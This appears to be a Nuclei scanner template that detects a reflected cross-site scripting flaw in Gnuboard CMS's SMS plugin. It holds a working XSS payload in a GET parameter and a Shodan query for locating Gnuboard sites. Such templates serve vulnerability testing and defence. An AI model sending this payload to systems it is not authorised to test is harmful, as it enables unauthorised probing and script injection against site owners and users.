id: gnuboard-sms-xss

info:
  name: Gnuboard CMS - Cross-Site Scripting
  author: gy741
  severity: medium
  description: Gnuboard CMS contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary JavaScript into the responses returned by the server.
  reference:
    - https://sir.kr/g5_pds/4788?page=5
    - https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"Gnuboard"
  tags: xss,gnuboard

http:
  - method: GET
    path:
      - "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard<svg+onload=alert(document.domain)>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"0nuboard<svg onload=alert(document.domain)>"'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100dabfa39b6636881c35a5a30673d9b76fcc447af1e2b2c6d3cedb815adfa392d402205ff4c64778cec76efddddd5d376938139916aad734b7077d3fa0286a76ff45d9:922c64590222798bb761d5b6d8e72950
